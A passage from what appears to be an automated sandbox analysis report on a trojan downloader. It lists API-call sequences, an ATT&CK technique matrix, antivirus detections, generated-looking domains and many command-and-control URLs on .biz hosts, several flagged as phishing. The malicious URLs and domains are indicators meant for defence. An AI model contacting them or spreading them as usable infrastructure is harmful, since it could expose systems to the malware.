tValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,FindCloseChangeNotification,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,FindCloseChangeNotification,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFil1_2_00403A19
Source: C:\Windows\SysWOW64\anfidear.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,FindCloseChangeNotification,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,FindCloseChangeNotification,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFil1_2_00403A19
Source: C:\Windows\SysWOW64\anfidear.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,FindCloseChangeNotification,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,CreateFileA,RegOpenKeyExA,RegOpenKeyExA,lstrlenA,RegSetVa2_2_00403A19
Source: C:\Windows\SysWOW64\anfidear.exeCode function: EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,FindCloseChangeNotification,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CloseHandle,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHandle,CreateFileA,RegOpenKeyExA,RegOpenKeyExA,lstrlenA,RegSetVa2_2_00403A19
Source: winlogon.exe, 00000003.00000002.4777607989.0000018820251000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000003.00000000.2321045685.0000018820251000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4776696060.00000000010B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
Source: winlogon.exe, 00000003.00000002.4777607989.0000018820251000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000003.00000000.2321045685.0000018820251000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.2326241159.0000000008924000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
Source: winlogon.exe, 00000003.00000002.4777607989.0000018820251000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000003.00000000.2321045685.0000018820251000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4776696060.00000000010B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
Source: explorer.exe, 00000005.00000000.2322542173.0000000000820000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.4775447391.0000000000820000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
Source: winlogon.exe, 00000003.00000002.4777607989.0000018820251000.00000002.00000001.00040000.00000000.sdmp, winlogon.exe, 00000003.00000000.2321045685.0000018820251000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000002.4776696060.00000000010B1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: 0_2_0040355D lstrcpyA,gethostbyname,htons,socket,closesocket,wsprintfA,lstrlenA,lstrcmpiA,lstrcmpiA,CreateThread,CloseHandle,GetSystemTimeAsFileTime,RegSetValueExA,RegSetValueExA,Sleep,0_2_0040355D
Source: C:\Users\user\Desktop\YsyrcskNFK.exeCode function: 0_2_00403A19 EntryPoint,GetProcessHeap,GetVersionExA,LoadLibraryA,GetProcAddress,GetModuleFileNameA,GetCommandLineA,CreateToolhelp32Snapshot,GetCurrentProcessId,Process32First,OpenProcess,CloseHandle,Process32Next,WaitForSingleObject,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RtlAdjustPrivilege,GetProcAddress,GetProcAddress,NtQueryInformationToken,NtQueryInformationToken,CloseHandle,FindCloseChangeNotification,GetProcAddress,GetCurrentProcessId,WSAStartup,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateFileA,SetFilePointer,ReadFile,CloseHandle,FindCloseChangeNotification,lstrcmpiA,wsprintfA,CreateMutexA,GetLastError,CreateToolhelp32Snapshot,RegDeleteValueA,RegCloseKey,GetCurrentProcessId,Process32First,lstrcmpiA,OpenProcess,Process32Next,CloseHandle,SetPriorityClass,TerminateProcess,WaitForSingleObject,CloseHandle,SetFileAttributesA,DeleteFileA,RegOpenKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegCloseKey,ExitProcess,CloseHandle,FindCloseChangeNotification,RegCreateKeyExA,RegCreateKeyExA,RegQueryValueExA,RegSetValueExA,RegCloseKey,ExpandEnvironmentStringsA,CreateFileA,GetFileTime,CloseHandle,GetSystemDirectoryA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,lstrcpyA,lstrcatA,ExpandEnvironmentStringsA,CreateFileA,SetFilePointer,WriteFile,CloseHandle,CreateFileA,SetFileTime,CloseHandle,SetFileAttributesA,CloseHandle,GetStartupInfoA,CreateProcessA,ExitProcess,CreateFileA,GetFileSize,ReadFile,CloseHandle,CreateThread,CloseHandle,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegDeleteValueA,lstrlenA,RegSetValueExA,RegCloseKey,GetComputerNameA,lstrcpyA,lstrcpyA,lstrcatA,lstrlenA,wsprintfA,lstrcpyA,lstrcatA,RegCreateKeyA,GetSystemDirectoryA,lstrcatA,lstrcatA,CreateMutexA,WaitForSingleObject,CloseHandle,Sleep,SetFileAttributesA,CreateFileA,WriteFile,lstrlenA,lstrcpyA,WriteFile,SetFileTime,CloseHandle,CreateFileA,RegSetValueExA,lstrlenA,RegSetValueExA,RegCloseKey,RegDeleteKeyA,RegDeleteValueA,RegCloseKey,lstrcmpiA,lstrcmpiA,SetFileAttributesA,DeleteFileA,CreateFileA,GetFileSize,CloseHandle,ReadFile,lstrcpyA,lstrcpyA,ExpandEnvironmentStringsA,GetTempFileNameA,CreateFileA,GetTempPathA,GetTempFileNameA,CreateFileA,WriteFile,CloseHandle,CreateFileA,GetSystemDirectoryA,lstrcatA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,SetFileTime,CloseHandle,GetLastError,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,GetTempPathA,lstrcatA,SetFileAttributesA,CreateFileA,GetLastError,CreateFileA,ExpandEnvironmentStringsA,lstrcatA,SetFileAttributesA,CreateFileA,WriteFile,CloseHan0_2_00403A19
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Native API
1
Registry Run Keys / Startup Folder
312
Process Injection
121
Masquerading
OS Credential Dumping1
System Time Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault AccountsScheduled Task/Job1
DLL Side-Loading
1
Registry Run Keys / Startup Folder
21
Virtualization/Sandbox Evasion
LSASS Memory121
Security Software Discovery
Remote Desktop ProtocolData from Removable Media2
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
DLL Side-Loading
312
Process Injection
Security Account Manager21
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
Deobfuscate/Decode Files or Information
NTDS13
Process Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information
LSA Secrets1
Application Window Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync3
System Information Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
YsyrcskNFK.exe87%ReversingLabsWin32.Trojan.ExplorerHijack
YsyrcskNFK.exe88%VirustotalBrowse
YsyrcskNFK.exe100%AviraTR/Downloader.Gen
YsyrcskNFK.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Windows\SysWOW64\oucradeam.dll100%AviraTR/Dldr.Agent.swim
C:\Windows\SysWOW64\anfidear.exe100%AviraTR/Downloader.Gen
C:\Users\user\AppData\Roaming\tmp5B02.tmp100%AviraTR/Downloader.Gen
C:\Windows\SysWOW64\anfidear.exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\cbofad-ugum.dll42%ReversingLabsWin32.Trojan.Generic
C:\Windows\SysWOW64\anfidear.exe87%ReversingLabsWin32.Trojan.ExplorerHijack
C:\Windows\SysWOW64\oucradeam.dll34%ReversingLabsWin32.Trojan.Wacatac
No Antivirus matches
SourceDetectionScannerLabelLink
oepwziolkasrnq.ph0%VirustotalBrowse
ojykg.ph0%VirustotalBrowse
lrnmqjyreikkk.ph0%VirustotalBrowse
xwygeqmmxmx.ws1%VirustotalBrowse
moayueuir.ws0%VirustotalBrowse
wdekkqy.ph0%VirustotalBrowse
tjmgkenb.vg0%VirustotalBrowse
jfziaqsqc.ws0%VirustotalBrowse
wmqukxacykyoqu.ws0%VirustotalBrowse
qhsyj.ws0%VirustotalBrowse
czgvgqx.vg0%VirustotalBrowse
wwwtmlycixa.ws0%VirustotalBrowse
ouuhxcrgcyy.vg0%VirustotalBrowse
sekohlmoeb.vg0%VirustotalBrowse
qzmzqqokwibp.vg0%VirustotalBrowse
egvcu.ph0%VirustotalBrowse
ibuda.ws0%VirustotalBrowse
yeqsiakjrkzcgn.ws1%VirustotalBrowse
jirrckkskcgfuk.vg1%VirustotalBrowse
ksacguagw.vg0%VirustotalBrowse
tggksvbebwrcu.ws0%VirustotalBrowse
kkugbysfjzw.ph1%VirustotalBrowse
SourceDetectionScannerLabelLink
http://isfusus-omoab.biz/d/N?023F5830C33F5830C30D581CC33F58129F2BBCFA513F5806ED0D7609F10F681EC30%Avira URL Cloudsafe
http://unmomis.biz/d/N?027A020A257A020A25480226257A0228796EE6C0B77A023C0B482C33174A3224250%Avira URL Cloudsafe
http://argunoos.biz/d/N?02F4389205F4389205C638BE05F438B059E0DC5897F438A42BC616AB37C408BC050%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?02EC71869EEC71869EDE71AA9EEC71A4C2F8954C0CEC71B0B0DE5FBFACDC41A89E100%Avira URL Cloudphishing
http://utbidet-ugeas.biz/d/N?020C6411C80C6411C83E643DC80C6433941880DB5A0C6427E63E4A28FA3C543FC8100%Avira URL Cloudphishing
https://android.notify.windows.com/iOSO0%Avira URL Cloudsafe
https://api.msn.com:443/v1/news/Feed/Windows?0%Avira URL Cloudsafe
https://android.notify.windows.com/iOSN0%Avira URL Cloudsafe
http://unmomis.biz/d/N?02AA9B7950AA9B7950989B5550AA9B5B0CBE7FB3C2AA9B4F7E98B540629AAB57500%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?02C22D9D4EC22D9D4EF02DB14EC22DBF12D6C957DCC22DAB60F003A47CF21DB34E100%Avira URL Cloudphishing
http://argunoos.biz/d/N?022200EEDE2200EEDE1000C2DE2200CC8236E4244C2200D8F0102ED7EC1230C0DE0%Avira URL Cloudsafe
http://isfusus-omoab.biz/d/N?020FAECEA10FAECEA13DAEE2A10FAEECFD1B4A04330FAEF88F3D80F7933F9EE0A10%Avira URL Cloudsafe
https://deff.nelreports.net/api/report?cat=msn0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?028CE4BE0E8CE4BE0EBEE4920E8CE49C529800749C8CE48820BECA873CBCD4900E100%Avira URL Cloudphishing
http://isfusus-omoab.biz/d/N?025AF9B0D95AF9B0D968F99CD95AF992854E1D7A4B5AF986F768D789EB6AC99ED90%Avira URL Cloudsafe
http://unmomis.biz/d/N?02783D303B783D303B4A3D1C3B783D12676CD9FAA9783D06154A130909480D1E3B0%Avira URL Cloudsafe
http://unmomis.biz/d/N?02B6A25941B6A2594184A27541B6A27B1DA24693D3B6A26F6F848C6073869277410%Avira URL Cloudsafe
http://unmomis.biz/d/N?02BE7E52F1BE7E52F18C7E7EF1BE7E70ADAA9A9863BE7E64DF8C506BC38E4E7CF10%Avira URL Cloudsafe
http://unmomis.biz/d/N?0216F0E01C16F0E01C24F0CC1C16F0C24002142A8E16F0D63224DED92E26C0CE1C0%Avira URL Cloudsafe
http://isfusus-omoab.biz/d/N?0204BF06E004BF06E036BF2AE004BF24BC105BCC7204BF30CE36913FD2348F28E00%Avira URL Cloudsafe
http://unmomis.biz/d/N?027E74C03B7E74C03B4C74EC3B7E74E2676A900AA97E74F6154C5AF9094E44EE3B0%Avira URL Cloudsafe
http://unmomis.biz/d/N?02A8648022A86480229A64AC22A864A27EBC804AB0A864B60C9A4AB9109854AE220%Avira URL Cloudsafe
http://unmomis.biz/d/N?025ACD21165ACD211668CD0D165ACD034A4E29EB845ACD173868E318246AFD0F160%Avira URL Cloudsafe
http://unmomis.biz/d/N?020CD6A67F0CD6A67F3ED68A7F0CD6842318326CED0CD690513EF89F4D3CE6887F0%Avira URL Cloudsafe
http://argunoos.biz/d/N?027AECC80B7AECC80B48ECE40B7AECEA576E0802997AECFE2548C2F1394ADCE60B0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?020FD0EDC80FD0EDC83DD0C1C80FD0CF941B34275A0FD0DBE63DFED4FA3FE0C3C8100%Avira URL Cloudphishing
http://isfusus-omoab.biz/d/N?02907F98B8907F98B8A27FB4B8907FBAE4849B522A907FAE96A251A18AA04FB6B80%Avira URL Cloudsafe
http://unmomis.biz/d/N?0299396D2A99396D2AAB39412A99394F768DDDA7B899395B04AB175418A909432A0%Avira URL Cloudsafe
http://unmomis.biz/d/N?02DE1C0024DE1C0024EC1C2C24DE1C2278CAF8CAB6DE1C360AEC323916EE2C2E240%Avira URL Cloudsafe
http://unmomis.biz/d/N?0218F0017918F001792AF02D7918F023250C14CBEB18F037572ADE384B28C02F790%Avira URL Cloudsafe
http://argunoos.biz/d/N?020F7DFF370F7DFF373D7DD3370F7DDD6B1B9935A50F7DC9193D53C6053F4DD1370%Avira URL Cloudsafe
https://wns.windows.com/r0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?02F01E3F00F01E3F00C21E1300F01E1D5CE4FAF592F01E092EC2300632C02E1100100%Avira URL Cloudphishing
http://%s.biz/d/N?http://%s.biz/d/G?http://%s/d/rpt?%smodemisdn%u.%u.%u.%s0%Avira URL Cloudsafe
http://isfusus-omoab.biz/d/N?02468495DF468495DF7484B9DF4684B78352605F4D4684A3F174AAACED76B4BBDF0%Avira URL Cloudsafe
http://isfusus-omoab.biz/d/N?02C4108CE5C4108CE5F610A0E5C410AEB9D0F44677C410BACBF63EB5D7F420A2E50%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?02D1AD1CC6D1AD1CC6E3AD30C6D1AD3E9AC549D654D1AD2AE8E38325F4E19D32C6100%Avira URL Cloudphishing
http://argunoos.biz/d/N?02CD9A7119CD9A7119FF9A5D19CD9A5345D97EBB8BCD9A4737FFB4482BFDAA5F190%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?025C30053D5C30053D6E30293D5C30276148D4CFAF5C3033136E1E3C0F6C002B3D100%Avira URL Cloudphishing
http://unmomis.biz/d/N?0235C7CA9F35C7CA9F07C7E69F35C7E8C32123000D35C7FCB107E9F3AD05F7E49F0%Avira URL Cloudsafe
http://isfusus-omoab.biz/d/N?02264C5283264C5283144C7E83264C70DF32A89811264C64AD14626BB1167C7C830%Avira URL Cloudsafe
http://unmomis.biz/d/N?02805AE06B805AE06BB25ACC6B805AC23794BE2AF9805AD645B274D959B06ACE6B0%Avira URL Cloudsafe
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi0%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?02BE549BBBBE549BBB8C54B7BBBE54B9E7AAB05129BE54AD958C7AA2898E64B5BB100%Avira URL Cloudphishing
http://argunoos.biz/d/N?0288D7D87388D7D873BAD7F47388D7FA2F9C3312E188D7EE5DBAF9E141B8E7F6730%Avira URL Cloudsafe
https://www.msn.com/en-us/news/politics/mitch-mcconnell-warns-house-republicans-about-hammerlock-of-0%Avira URL Cloudsafe
http://unmomis.biz/d/N?020385A7870385A78731858B87038585DB17616D15038591A931AB9EB533B589870%Avira URL Cloudsafe
http://isfusus-omoab.biz/d/N?02386863C1386863C10A684FC13868419D2C8CA953386855EF0A465AF308584DC10%Avira URL Cloudsafe
http://utbidet-ugeas.biz/d/N?0298E2C40A98E2C40AAAE2E80A98E2E6568C060E9898E2F224AACCFD38A8D2EA0A100%Avira URL Cloudphishing
